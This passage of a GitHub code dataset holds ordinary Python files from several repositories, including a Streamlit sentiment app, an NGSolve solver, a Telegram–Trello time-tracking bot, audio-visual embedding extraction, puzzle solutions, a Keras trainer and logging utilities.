mock_post.return_value.close.assert_called_once()\n","repo_name":"meanother/tpulse-py","sub_path":"tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"24279890057","text":"#note to self, for running on my Desktop I have to use pyenv to install python 3.7.0 and then install strealit v 0.62.0\n#otherwise I get some junk about \"illegal hardware instruction\"\nimport streamlit as st\nimport pickle\n\nfrom science import classify\nimport sys\n#idk what it is about the import system, but it never seems to just work\nsys.path.append(\"./science\")\nfrom helpers import token_lemma\n\nloaded_model = pickle.load(open(\"./science/model.pkl\", 'rb'))\nloaded_vectorizer = pickle.load(open(\"./science/vectorizer.pkl\", 'rb'))\n\n\nmodel = classify.sentimenter(loaded_model, loaded_vectorizer)\n\nst.title('An online sentiment classifier')\n\nst.write(\"Enter text, up to 140 characters, that you'd like to know the sentiment of.\")\nst.write(\"Sorry, emojis will be ignored 😭\")\n\n\nsentence = st.text_area('Input your text here:', \"Data science is great!\")\nmaxlen = 140\nif len(sentence) > maxlen:\n st.error(f\"Input too long by {len(sentence) - maxlen} characters, please try again.\")\nelse:\n result = model.get_probs(sentence)\n \n st.success(f\"There's a {result[0]*100:.2f}% chance this is negative and a {result[1]*100:.2f}% chance it's positive.\")\n","repo_name":"nkvaltine/onlineSentiment","sub_path":"onlineSentiment.py","file_name":"onlineSentiment.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74745065424","text":"# James Elgy - 04/05/2023\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport multiprocessing\nimport tqdm\nfrom ngsolve import *\nfrom ..Core_MPT.Theta0 import *\nfrom ..Core_MPT.imap_execution import *\nfrom warnings import warn\n\ndef Solve_Theta_0_Problem(Additional_Int_Order, CPUs, Maxsteps, Order, Solver, Tolerance, alpha, epsi, inout, mesh, mu_inv,\n recoverymode, sweepname):\n \"\"\"\n James Elgy - 2023\n Function to call and run the theta0 solver for MPT calculator. Note that this is intended as a general function,\n thus options such as recoverymode and sweepname may not be relevant in all cases and can be set to False.\n\n recoverymode now raises an error if Theta0.npy is not found. This is to avoid mistakenly calculating Theta0 for\n an incorrect set of parameters and improve user safety.\n\n Parameters\n ----------\n Additional_Int_Order: int bonus integration order added to linear and bilinear forms.\n CPUs: number of cpus assigned to the problem. 1 runs through in sequential mode.\n Maxsteps: int max steps assigned to the CGSolver.\n Order: int order of basis functions assigned in fes.\n Solver: str for preconditioner name, e.g. 'bddc'\n Tolerance: float solver tolerance\n alpha: float object scaling alpha\n epsi: float numeric regularisation constant\n inout: CoefficientFunction 1 inside object 0 outside.\n mesh: NGsolve mesh for the object\n mu: CoefficientFunction with relative permeabilty assigned to each region\n recoverymode: bool for if theta0 can be loaded from disk rather than recalculated. Used in POD modes.\n sweepname: str for the folder path used in recoverymode.\n\n Returns\n -------\n Theta0Sol,\n Theta0i,\n Theta0j,\n fes,\n ndof,\n evec\n \"\"\"\n\n # Setup the finite element space\n dom_nrs_metal = [0 if mat == \"air\" else 1 for mat in mesh.GetMaterials()]\n fes = HCurl(mesh, order=Order, dirichlet=\"outer\", gradientdomains=dom_nrs_metal)\n # fes = HCurl(mesh, order=Order, dirichlet=\"outer\", flags = { \"nograds\" : True })\n # Count the number of degrees of freedom\n ndof = fes.ndof\n # Define the vectors for the right hand side\n evec = [CoefficientFunction((1, 0, 0)), CoefficientFunction((0, 1, 0)), CoefficientFunction((0, 0, 1))]\n # Setup the grid functions and array which will be used to save\n Theta0i = GridFunction(fes)\n Theta0j = GridFunction(fes)\n Theta0Sol = np.zeros([ndof, 3])\n\n if CPUs > 1:\n if recoverymode is False:\n # Setup the inputs for the functions to run\n Theta0CPUs = min(3, multiprocessing.cpu_count(), CPUs)\n Runlist = []\n for i in range(3):\n if Theta0CPUs < 3:\n NewInput = (\n fes, Order, alpha, mu_inv, inout, evec[i], Tolerance, Maxsteps, epsi, i + 1, Solver, Additional_Int_Order, 'Theta0')\n else:\n NewInput = (fes, Order, alpha, mu_inv, inout, evec[i], Tolerance, Maxsteps, epsi, \"No Print\", Solver,\n Additional_Int_Order, 'Theta0')\n Runlist.append(NewInput)\n # Run on the multiple cores\n with multiprocessing.get_context(\"spawn\").Pool(Theta0CPUs) as pool:\n Output = list(tqdm.tqdm(pool.map(imap_version, Runlist), total=len(Runlist), desc='Solving Theta0'))\n\n print(' solved theta0 problems ')\n\n # Unpack the outputs\n for i, Direction in enumerate(Output):\n Theta0Sol[:, i] = Direction\n else:\n Theta0Sol = np.load('Results/' + sweepname + '/Data/Theta0.npy')\n\n else:\n if recoverymode is False:\n # Run in three directions and save in an array for later\n for i in tqdm.tqdm(range(3), desc='Solving Theta0'):\n Theta0Sol[:, i] = Theta0(fes, Order, alpha, mu_inv, inout, evec[i], Tolerance, Maxsteps, epsi, i + 1,\n Solver, Additional_Int_Order)\n print(' solved theta0 problems ')\n else:\n Theta0Sol = np.load('Results/' + sweepname + '/Data/Theta0.npy')\n\n\n return Theta0Sol, Theta0i, Theta0j, fes, ndof, evec\n\n\nif __name__ == '__main__':\n pass\n","repo_name":"MPT-Calculator/MPT-Calculator","sub_path":"Functions/Core_MPT/Solve_Theta_0_Problem.py","file_name":"Solve_Theta_0_Problem.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"69820901905","text":"from datetime import timedelta\n\nimport trolly\nfrom django.utils import timezone\nfrom telebot.types import Message\n\nfrom base import utils as base_utils\nfrom base.utils import mytime\nfrom bot import utils as bot_utils, keyboards\nfrom bot.handlers import tgbot\nfrom bot.models import TgUser, Token, Timer\nfrom bot.utils import TrelloClient\n\n\nclass PrivateHandler(bot_utils.BaseHandler):\n @staticmethod\n @tgbot.message_handler(TgUser.is_private, commands=keyboards.Start.commands())\n def start(tguser: TgUser):\n parts = tguser.message.text.split()\n if len(parts) == 2:\n # noinspection PyBroadException\n try:\n s = base_utils.real_urlsafe_b64decode(parts[1].encode()).decode()\n if s.startswith('token:'):\n p = s.split(':')\n if len(p) == 2:\n token_id = p[1]\n t = Token.objects.filter(id=token_id, created_at__gt=timezone.now() - timedelta(days=1)).first()\n if t:\n token = t.token\n t.delete()\n tguser.authorize(token)\n return tguser.render_to_string('bot/private/authorized.html', keyboard=keyboards.Start)\n except Exception:\n pass\n if not tguser.is_authorized():\n PrivateHandler.unauthorized(tguser)\n else:\n PrivateHandler.boards(tguser)\n\n @classmethod\n def unauthorized(cls, tguser: TgUser):\n assert isinstance(tguser.client, TrelloClient)\n url = tguser.client.get_authorisation_url()\n tguser.render_to_string('bot/private/errors/not_authorized.html', context=dict(url=url), edit=True)\n\n @staticmethod\n @tgbot.message_handler(TgUser.is_private, TgUser.is_authorized, regexp=keyboards.Boards.emoji_to_regexp())\n @tgbot.message_handler(TgUser.is_private, TgUser.is_authorized, commands=keyboards.Boards.commands())\n def boards(tguser: TgUser):\n assert isinstance(tguser.client, TrelloClient)\n boards = tguser.client.get_boards()\n timer_board_ids = tguser.timer_set.values_list('board_id', flat=True)\n tguser.render_to_string('bot/private/choose_board.html', keyboard=keyboards.Boards(tguser, boards, timer_board_ids), edit=True)\n\n @staticmethod\n @tgbot.callback_query_handler(TgUser.is_authorized, data_startswith='/board ')\n def board(tguser: TgUser, board_id=None):\n if board_id is None:\n board_id = tguser.callback_query_data_get(1)\n assert isinstance(tguser.client, TrelloClient)\n board = tguser.client.get_board(board_id)\n assert isinstance(board, trolly.Board)\n lists = board.get_lists()\n timer_list_ids = tguser.timer_set.values_list('list_id', flat=True)\n tguser.render_to_string('bot/private/choose_list.html', keyboard=keyboards.Lists(tguser, lists, timer_list_ids), edit=True)\n\n @staticmethod\n @tgbot.callback_query_handler(TgUser.is_authorized, data_startswith='/board_list ')\n def board_list(tguser: TgUser, list_id=None):\n if list_id is None:\n list_id = tguser.callback_query_data_get(1)\n assert isinstance(tguser.client, TrelloClient)\n board_list = tguser.client.get_list(list_id)\n assert isinstance(board_list, trolly.List)\n cards = board_list.get_cards()\n timer_card_ids = tguser.timer_set.values_list('card_id', flat=True)\n tguser.render_to_string('bot/private/choose_card.html', keyboard=keyboards.Cards(tguser, list_id, cards, timer_card_ids), edit=True)\n\n @staticmethod\n @tgbot.callback_query_handler(TgUser.is_authorized, data_startswith='/card ')\n def card(tguser: TgUser):\n card_id = tguser.callback_query_data_get(1)\n assert isinstance(tguser.client, TrelloClient)\n card = tguser.client.get_card(card_id)\n assert isinstance(card, trolly.Card)\n card_info = card.get_card_information()\n timer = tguser.timer_set.filter(card_id=card_id).first()\n message = tguser.render_to_string('bot/private/show_card.html', context=dict(card=card_info), keyboard=keyboards.Card(tguser, card_id, timer), edit=True)\n if timer:\n assert isinstance(message, Message)\n timer.message_id = message.message_id\n timer.save()\n\n @staticmethod\n @tgbot.callback_query_handler(TgUser.is_authorized, data_startswith='/timer_start ')\n def timer_start(tguser: TgUser):\n card_id = tguser.callback_query_data_get(1)\n assert isinstance(tguser.client, TrelloClient)\n card = tguser.client.get_card(card_id)\n assert isinstance(card, trolly.Card)\n timer = tguser.timer_set.filter(card_id=card_id).first()\n if timer:\n tguser.answer_callback_query('Timer was already started', show_alert=True)\n raise bot_utils.StateErrorHandler('timer_already_started')\n if tguser.timer_set.exists():\n tguser.answer_callback_query('You cannot start more than one timer simultaneously', show_alert=True)\n raise bot_utils.StateErrorHandler('multiple_timers')\n card_info = card.get_card_information()\n timer = tguser.timer_set.create(\n board_id=card_info['idBoard'],\n list_id=card_info['idList'],\n card_id=card_id,\n message_id=tguser.callback_query.message.message_id,\n )\n tguser.edit_message_reply_markup(keyboard=keyboards.Card(tguser, card_id, timer))\n\n @staticmethod\n @tgbot.callback_query_handler(TgUser.is_authorized, data_startswith='/timer ')\n def timer(tguser: TgUser):\n card_id = tguser.callback_query_data_get(1)\n assert isinstance(tguser.client, TrelloClient)\n card = tguser.client.get_card(card_id)\n assert isinstance(card, trolly.Card)\n timer = tguser.timer_set.filter(card_id=card_id).first()\n if not timer:\n tguser.answer_callback_query('Timer was not started', show_alert=True)\n raise bot_utils.StateErrorHandler('timer_not_started')\n tguser.edit_message_reply_markup(keyboard=keyboards.Card(tguser, card_id, timer))\n\n @staticmethod\n @tgbot.callback_query_handler(TgUser.is_authorized, data_startswith='/timer_stop ')\n def timer_stop(tguser: TgUser):\n card_id = tguser.callback_query_data_get(1)\n assert isinstance(tguser.client, TrelloClient)\n card = tguser.client.get_card(card_id)\n assert isinstance(card, trolly.Card)\n timer = tguser.timer_set.filter(card_id=card_id).first()\n if not timer:\n tguser.answer_callback_query('Timer was not started', show_alert=True)\n raise bot_utils.StateErrorHandler('timer_not_started')\n assert isinstance(timer, Timer)\n dur = timezone.now() - timer.created_at\n d = '%.2f' % (dur.seconds / 3600)\n card.add_comments('plus! %s/%s' % (d, d))\n timer.delete()\n logged = mytime(dur, True)\n tguser.answer_callback_query('Logged %s' % logged)\n tguser.edit_message_reply_markup(keyboard=keyboards.Card(tguser, card_id, None))\n\n @staticmethod\n @tgbot.callback_query_handler(TgUser.is_authorized, data_startswith='/timer_reset ')\n def timer_reset(tguser: TgUser):\n card_id = tguser.callback_query_data_get(1)\n assert isinstance(tguser.client, TrelloClient)\n card = tguser.client.get_card(card_id)\n assert isinstance(card, trolly.Card)\n timer = tguser.timer_set.filter(card_id=card_id).first()\n if not timer:\n tguser.answer_callback_query('Timer was not started', show_alert=True)\n raise bot_utils.StateErrorHandler('timer_not_started')\n timer.delete()\n tguser.answer_callback_query('Timer was reset!')\n tguser.edit_message_reply_markup(keyboard=keyboards.Card(tguser, card_id, None))\n\n @staticmethod\n @tgbot.callback_query_handler(TgUser.is_authorized, data_startswith='/timer_plus ')\n def timer_plus(tguser: TgUser):\n card_id = tguser.callback_query_data_get(1)\n minutes = tguser.callback_query_data_get(2, as_int=True)\n assert isinstance(tguser.client, TrelloClient)\n card = tguser.client.get_card(card_id)\n assert isinstance(card, trolly.Card)\n timer = tguser.timer_set.filter(card_id=card_id).first()\n if not timer:\n tguser.answer_callback_query('Timer was not started', show_alert=True)\n raise bot_utils.StateErrorHandler('timer_not_started')\n assert isinstance(timer, Timer)\n timer.created_at = timer.created_at - timedelta(minutes=minutes)\n timer.save()\n tguser.answer_callback_query('Timer was increased on %s minutes' % minutes)\n tguser.edit_message_reply_markup(keyboard=keyboards.Card(tguser, card_id, timer))\n\n @staticmethod\n @tgbot.callback_query_handler(TgUser.is_authorized, data_startswith='/back ')\n def back(tguser: TgUser):\n obj_type = tguser.callback_query_data_get(1)\n obj_id = tguser.callback_query_data_get(2)\n assert isinstance(tguser.client, TrelloClient)\n if obj_type == 'card':\n card = tguser.client.get_card(obj_id)\n assert isinstance(card, trolly.Card)\n card_info = card.get_card_information()\n return PrivateHandler.board_list(tguser, card_info['idList'])\n if obj_type == 'list':\n board_list = tguser.client.get_list(obj_id)\n assert isinstance(board_list, trolly.List)\n board = board_list.get_board()\n return PrivateHandler.board(tguser, board.id)\n PrivateHandler.boards(tguser)\n\n @staticmethod\n @tgbot.message_handler(TgUser.is_private, regexp=keyboards.Help.emoji_to_regexp())\n @tgbot.message_handler(TgUser.is_private, commands=keyboards.Help.commands() + ['sos'])\n def help(tguser: TgUser):\n tguser.render_to_string('bot/private/help.html', keyboard=keyboards.Start)\n\n @staticmethod\n @tgbot.message_handler(TgUser.is_private, commands=['settings'])\n def settings(tguser: TgUser):\n tguser.send_message('Настроек пока нет', keyboard=keyboards.Start)\n","repo_name":"ihoru/trelloplusbot","sub_path":"bot/handlers/private_chat.py","file_name":"private_chat.py","file_ext":"py","file_size_in_byte":10215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36860430945","text":"import argparse\nimport torch\nimport torch.utils.data as data\nimport os\nimport numpy as np\nimport tqdm\nimport math\nimport scipy.io.wavfile as wavfile\nfrom slsyn_net import slsyn_net\nimport cv2 as cv\n\nclass dataset(data.Dataset):\n def __init__(self,\n mix_lst_path,\n audio_direc,\n visual_direc,\n batch_size=1,\n partition='test',\n sampling_rate=16000):\n\n self.mixture_direc = audio_direc\n self.visual_direc = visual_direc\n self.sampling_rate = sampling_rate\n\n self.mix_lst=open(mix_lst_path).read().splitlines()\n # self.mix_lst=list(filter(lambda x: x.split(',')[0]==partition, self.mix_lst))\n\n def __getitem__(self, index):\n line = self.mix_lst[index]\n embedding_save_path=line.split(',')[0]+'/'+ line.replace(',','_').replace('/', '_')\n\n mixture_path=self.mixture_direc+line.split(',')[0]+'/'+ line.replace(',','_').replace('/', '_') +'.wav'\n _, mixture = wavfile.read(mixture_path)\n mixture = self._audio_norm(mixture)\n \n min_length = mixture.shape[0]\n\n line=line.split(',')\n\n c = 0 # The first speaker in the mixture list is the target speaker\n # read video\n length = math.floor(min_length/self.sampling_rate*25)\n\n roiSize = 112\n visual_path=self.visual_direc+line[c*4+1]+'/'+line[c*4+2]+'/'+line[c*4+3]+'.mp4'\n captureObj = cv.VideoCapture(visual_path)\n roiSequence = []\n while (captureObj.isOpened()):\n ret, frame = captureObj.read()\n if ret == True:\n grayed = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\n grayed = cv.resize(grayed, (roiSize*2,roiSize*2))\n roi = grayed[int(roiSize-(roiSize/2)):int(roiSize+(roiSize/2)), int(roiSize-(roiSize/2)):int(roiSize+(roiSize/2))]\n roiSequence.append(roi)\n else:\n break\n captureObj.release()\n visual = np.asarray(roiSequence)/255.0\n visual = (visual[:length] - 0.4161)/0.1688\n\n if visual.shape[0] < length:\n visual = np.pad(visual, ((0,int(length - visual.shape[0])),(0,0),(0,0)), mode = 'edge')\n\n return mixture, visual, (embedding_save_path)\n\n def __len__(self):\n return len(self.mix_lst)\n\n def _audio_norm(self,audio):\n return np.divide(audio, np.max(np.abs(audio)))\n\ndef main(args):\n # Model\n model = slsyn_net()\n model = model.cuda()\n pretrained_model = torch.load('slsyn_model_dict.pt', map_location='cpu')['model']\n\n state = model.state_dict()\n for key in state.keys():\n pretrain_key = 'module.' + key\n if pretrain_key in pretrained_model.keys():\n state[key] = pretrained_model[pretrain_key]\n else:\n print(\"not %s loaded\" % pretrain_key)\n model.load_state_dict(state)\n\n\n\n datasets = dataset(\n mix_lst_path=args.mix_lst_path,\n audio_direc=args.audio_direc,\n visual_direc=args.visual_direc)\n\n test_generator = data.DataLoader(datasets,\n batch_size = 1,\n shuffle = False,\n num_workers = 1)\n\n \n model.eval()\n with torch.no_grad():\n for i, (a_mix, v_tgt, fname) in enumerate(tqdm.tqdm(test_generator)):\n a_mix = a_mix.cuda().float()\n v_tgt = v_tgt.cuda().float()\n\n out = model(a_mix, v_tgt)\n\n out = out.squeeze(0).cpu().numpy().T\n # print(out.shape)\n\n save_path = \"/home/panzexu/datasets/voxceleb2/visual_embedding/sync/sync_av/\" + fname[0] +'.npy'\n\n if not os.path.exists(save_path.rsplit('/', 1)[0]):\n os.makedirs(save_path.rsplit('/', 1)[0])\n np.save(save_path, out)\n \n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\"SLSyn network extract embedding\")\n \n # Dataloader\n parser.add_argument('--mix_lst_path', type=str, default='/home/panzexu/datasets/voxceleb2/audio_mixture/2_mix_min_800/mixture_data_list_2mix.csv',\n help='directory including train data')\n parser.add_argument('--visual_direc', type=str, default='/home/panzexu/datasets/voxceleb2/orig/',\n help='directory including test data')\n parser.add_argument('--audio_direc', type=str, default='/home/panzexu/datasets/voxceleb2/audio_mixture/2_mix_min_800/',\n help='directory of audio')\n args = parser.parse_args()\n\n main(args)","repo_name":"zexupan/reentry","sub_path":"pretrained_slsyn/slsyn_extract_embedding.py","file_name":"slsyn_extract_embedding.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"74747787664","text":"#!/usr/bin/env python\n\nclass SplitDateStr():\n\n def __init__(self, datestr):\n\n self.datestr = datestr\n self.a = ' '\n\n def datelist(self):\n for i in self.datestr:\n if i == '-':\n i = \" \"\n\n self.a += i\n\n splite_date= self.a.split()\n\n date_list = [ int(i) for i in splite_date ]\n\n return date_list\n\n# Test\nc='2023-02-14'\nTest = SplitDateStr(c)\nprint(Test.datelist())\n","repo_name":"daveads/discord-profile-bot","sub_path":"core/splitdate.py","file_name":"splitdate.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25872195141","text":"import sys\ninput = sys.stdin.readline\nn,m,r = map(int, input().split())\ndata = [ list(map(int,input().split())) for _ in range(n)]\ntemp =[ [0 for _ in range(m)] for i in range(n)]\n#회전하는 함수 \ndef rotate():\n for i in range(min(n,m)//2): #줄별로 회전시킴\n # 좌측 최하단의 점을 빼준다. 예제(4,1) 점을 빼주는 형식\n pick = data[n-1-i][i]\n # 우측 최하단에서부터 회전하는 방향을 역으로 한다고 생각\n # (4,1)<-(3,1)<-(2,1) 을 차례 채워준다고 생각하면 된다. \n for j in range(n-1-i-1,i-1,-1):\n data[j+1][i] = data[j][i] \n \n # 제일 윗줄\n for j in range(i+1,m-i):\n data[i][j-1] = data[i][j]\n # 제일 오른쪽 줄 \n for j in range(i+1,n-i):\n data[j-1][m-i-1] = data[j][m-i-1]\n # 제일 아랫줄\n for j in range(m-2-i,i,-1):\n data[n-1-i][j+1] = data[n-1-i][j]\n data[n-1-i][i+1] = pick\n#r번 회전\nfor k in range(r): \n rotate()\n#결과 출력 \n\n#결과 출력 \nfor i in data:\n for j in i:\n print(j, end=' ')\n print('')\n","repo_name":"gkgg123/TIL_new","sub_path":"알��리즘/백준/16926_배열_돌리기_1_version1.py","file_name":"16926_배열_돌리기_1_version1.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43744027963","text":"from NetworkTrainer import NetworkTrainer\r\nfrom tensorflow.keras import models, layers\r\nfrom sklearn.metrics import accuracy_score\r\n\r\n\r\nclass SusyCrossSectionPredictor(NetworkTrainer):\r\n def __init__(self, train_file: str, test_file: str, target: str = '',\r\n standardised: bool = False, normalised: bool = False):\r\n super().__init__(train_file, test_file, target,\r\n standardised, normalised)\r\n\r\n def train(self, method: str):\r\n if method == 'seq':\r\n model = models.Sequential()\r\n model.add(layers.Dense(64, 'relu',\r\n input_shape=(len(self.attributes),))\r\n )\r\n model.add(layers.Dense(64, 'relu'))\r\n model.add(layers.Dense(64, 'relu'))\r\n model.add(layers.Dense(1, 'relu'))\r\n model.compile(optimizer='adam', loss='MSE',\r\n metrics=['accuracy', 'MAE', 'MAPE'])\r\n\r\n return self._train_model(model)\r\n else:\r\n raise Exception(\"No proper training method provided.\")\r\n\r\n def _train_model(self, training_model):\r\n # Define for readability:\r\n t, att = self.target, self.attributes\r\n v_data = (self.val_data[att], self.val_data[t])\r\n\r\n history = training_model.fit(self.train_data[att],\r\n self.train_data[t],\r\n epochs=2,\r\n validation_data=v_data)\r\n\r\n prediction = training_model.predict(self.val_data[att])\r\n acc = accuracy_score(self.val_data[t], prediction)\r\n\r\n print(acc)\r\n\r\n return training_model\r\n","repo_name":"GroenteLepel/ML_ParticleAndAstrophysics","sub_path":"SusyCrossSectionPredictor.py","file_name":"SusyCrossSectionPredictor.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15722174305","text":"import re\nimport sys\nfrom collections import defaultdict\n\n\ndef main():\n if len(sys.argv) > 1:\n filename = sys.argv[1]\n else:\n filename = \"input.txt\"\n with open(filename) as f:\n input_text = f.read().strip()\n print(f\"Answer: {calculate(input_text)}\")\n\n\ndef calculate(input_text):\n given = get_re(input_text)\n memory = defaultdict(int)\n for mask in given:\n for mem, val in given[mask]:\n memory[mem] = maskate(mask, val)\n return sum(memory.values())\n\n\ndef maskate(mask, val):\n or_mask = int(mask.replace(\"X\", \"0\"), base=2)\n and_mask = int(mask.replace(\"X\", \"1\"), base=2)\n val = val & and_mask\n val = val | or_mask\n return val\n\n\ndef get_re(s):\n given = defaultdict(list)\n r_mem = re.compile(r\"(\\d+)\")\n for line in s.split(\"\\n\"):\n if line.startswith(\"mask\"):\n curr_mask = line[7:]\n else:\n vals = r_mem.findall(line)\n given[curr_mask].append((int(vals[0]), int(vals[1])))\n return given\n\n\nif __name__ == \"__main__\":\n exit(main())\n","repo_name":"nealcox/aoc2020","sub_path":"day14/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3372639708","text":"import errno\nimport json\nimport jsonpickle\nimport logging\nimport os\nimport shutil\nimport subprocess\nfrom operator import itemgetter\n\nimport natsort\nimport math\nimport time\nimport datetime\n\nclass DatetimeEncoder(json.JSONEncoder):\n def default(self, obj):\n try:\n return super(DatetimeEncoder, obj).default(obj)\n except TypeError:\n return str(obj)\n\n# FUNCTIONS\n\ndef assertType(var_name, var_val, var_type):\n if not isinstance (var_val, var_type):\n raise Exception (\"Unrecognized type of {}={} ({}). Expected type: {}\"\n .format (var_name, var_val, type (var_val), var_type))\n\n__glo_log_file = None\n\ndef getCurrentLogFile():\n return __glo_log_file\n\ndef loggerSetup(log_file, remove_old_log=True, print_start_date = True):\n global __glo_log_file\n\n #Reset logging handlers\n logging.getLogger().handlers = []\n\n #log_format_str = \"[%(asctime)s:%(levelname)s:%(filename)s:%(lineno)d:%(funcName)s] %(message)s\"\n #log_format_str = \"[%(levelname)-5s:%(filename)-20s:%(lineno)-3s:%(funcName)-20s] %(message)s\"\n log_format_str = \"[%(filename)-20s:%(lineno)-3s:%(funcName)-20s] %(message)s\"\n fmt = logging.Formatter(log_format_str, datefmt='%H:%M:%S')\n\n # console log handler\n console_handler = logging.StreamHandler()\n console_handler.setLevel(logging.INFO)\n console_handler.setFormatter(fmt)\n logging.getLogger().addHandler(console_handler)\n\n # file log handler\n if log_file is not None:\n if remove_old_log:\n silentRemove(log_file)\n file_handler = logging.FileHandler(log_file, mode='a', encoding=\"utf8\")\n file_handler.setLevel(logging.DEBUG)\n file_handler.setFormatter(fmt)\n logging.getLogger().addHandler(file_handler)\n __glo_log_file = log_file\n\n # root logger\n logging.getLogger().setLevel(logging.DEBUG)\n if print_start_date:\n logging.info(\"Starting at: \" + time.strftime(\"%Y-%m-%d\"))\n\ndef setup(log_file, output_file):\n loggerSetup(log_file)\n if output_file:\n silentRemove(output_file)\n # Initialize JSON pickle\n iniJSONPickle()\n\ndef isValid(indata):\n # !!! REMEMBER THAT bool(math.nan) RETURNS TRUE. NAN IS TRUE !!!\n a = not isNan(indata)\n b = (indata is not None)\n return (a and b)\n\ndef isNan(num):\n return isinstance(num, float) and math.isnan(num)\n\ndef str2date(instr):\n \"\"\"\n Converts a string in the form of \"YEAR-MONTH-DAY\" (e.g. 2010-09-08) or \"current\" to a datetime.datetime object\n Correctly handles NaN and None\n :param instr: The date to convert from in string format\n :return: the datetime.date object or None if the conversion fails\n \"\"\"\n # already a date\n if isinstance(instr, datetime.date):\n return instr\n\n # detects None\n if instr is None:\n return None\n\n #detect NaN\n if isinstance(instr, float) and math.isnan(instr):\n return None\n\n #current\n if instr == \"current\":\n return datetime.datetime.now().date()\n\n #assume year-month-day\n try:\n res = datetime.datetime.strptime(instr, \"%Y-%m-%d\").date()\n except TypeError:\n logging.critical(\"TypeError: instr='{}' ({})\".format(instr, type(instr)))\n raise\n except ValueError:\n logging.critical(\"ValueError: instr='{}' ({})\".format(instr, type(instr)))\n raise\n return res\n\ndef str2dateVicoFormat(instr):\n \"\"\"\n Converts a string in the form of \"YEAR-MONTH-DAY\" (e.g. 2010-09-08) or \"current\" to a datetime.datetime object\n Correctly handles NaN and None\n :param instr: The date to convert from in string format\n :return: the datetime.date object or None if the conversion fails\n \"\"\"\n\n #detect NaN\n if isinstance(instr, float) and math.isnan(instr):\n return None\n\n #assume year-month-day\n dash_arr = instr.split('-')\n if len(dash_arr[0]) == 4:\n dformat = \"%Y-%m-%d\"\n elif len(dash_arr[2]) == 4:\n dformat = \"%d-%m-%Y\"\n else:\n raise Exception(\"Format not understood for: {}\".format(instr))\n \n try:\n res = datetime.datetime.strptime(instr, dformat).date()\n except TypeError:\n logging.critical(\"TypeError: instr='{}' ({})\".format(instr, type(instr)))\n raise\n except ValueError:\n logging.critical(\"ValueError: instr='{}' ({})\".format(instr, type(instr)))\n raise\n return res\n\ndef remDir(dir):\n # Remove folder\n if os.path.isdir(dir):\n shutil.rmtree(dir)\n # Independently of wheter it already existed or not\n os.makedirs(dir, exist_ok=True)\n\n\ndef sortDFColumns(frame, first_cols=[]):\n \"\"\"\n Sort the columns of a dataframe\n :param frame: The pandas.DataFrame\n :param first_cols: A list of columns to put first\n :return: The sorted DataFrame\n \"\"\"\n\n # Build a dict col->cardinal number\n col_map = dict()\n for i, c in enumerate(first_cols):\n if c not in frame:\n raise Exception(\"{} is not in the DataFrame ({})\".format(c, list(frame)))\n col_map[c] = str(i+1)\n\n # Rename columns\n frame.rename(columns=col_map, inplace=True)\n\n # Sort columns\n frame = frame.reindex_axis(natsort.natsorted(frame.columns, alg=natsort.ns.IGNORECASE), axis=1)\n\n # Rename columns back\n inv_map = {v:k for k,v in col_map.items()}\n frame.rename(columns=inv_map, inplace=True)\n\n return frame\n\n\ndef column(matrix, i):\n f = itemgetter(i)\n return map(f, matrix)\n\n\ndef silentRemove(filename):\n try:\n os.remove(filename)\n except OSError as e: # this would be \"except OSError, e:\" before Python 2.6\n if e.errno != errno.ENOENT: # errno.ENOENT = no such file or directory\n raise # re-raise exception if a different error occurred\n\n\n# Print iterations progress\ndef printProgressBar(iteration, total, prefix='', suffix='', decimals=1, length=100, fill='█'):\n \"\"\"\n Call in a loop to create terminal progress bar\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent complete (Int)\n length - Optional : character length of bar (Int)\n fill - Optional : bar fill character (Str)\n \"\"\"\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\n filledLength = int(length * iteration // total)\n bar = fill * filledLength + '-' * (length - filledLength)\n print('\\r%s |%s| %s%% %s' % (prefix, bar, percent, suffix), end='\\r')\n # Print New Line on Complete\n if iteration == total:\n print()\n\n\ndef csv2stata(infile):\n stata_exe = \"C:\\Program Files (x86)\\Stata13\\StataMP-64.exe\"\n\n if not os.path.isfile(stata_exe):\n raise Exception(\"STATA not found: {}\".format(stata_exe))\n\n if not os.path.isfile(infile):\n raise Exception(\"Input file not found: {}\".format(infile))\n\n infile = os.path.abspath(infile)\n root_dir, in_base = os.path.split(infile)\n in_name = os.path.splitext(in_base)[0]\n do_file = os.path.join(root_dir, in_name + \".do\")\n dta_file = os.path.join (root_dir, in_name + \".dta\")\n log_file = os.path.join (root_dir, in_name + \".log\")\n silentRemove(do_file)\n silentRemove(dta_file)\n silentRemove (log_file)\n\n do_cont = 'clear all \\n'\n do_cont += 'import delimited using \"' + in_base + '\", delimiters(\",\") bindquotes(strict) \\n'\n do_cont += 'save \"' + in_name + '\", replace \\n' # very import the last new line\n\n with open(do_file, 'w') as file:\n file.write(do_cont)\n\n command_line = \"\\\"\" + stata_exe + \"\\\" /e do \" + do_file\n logging.info(command_line)\n #os.system(command_line)\n res = subprocess.call([stata_exe, 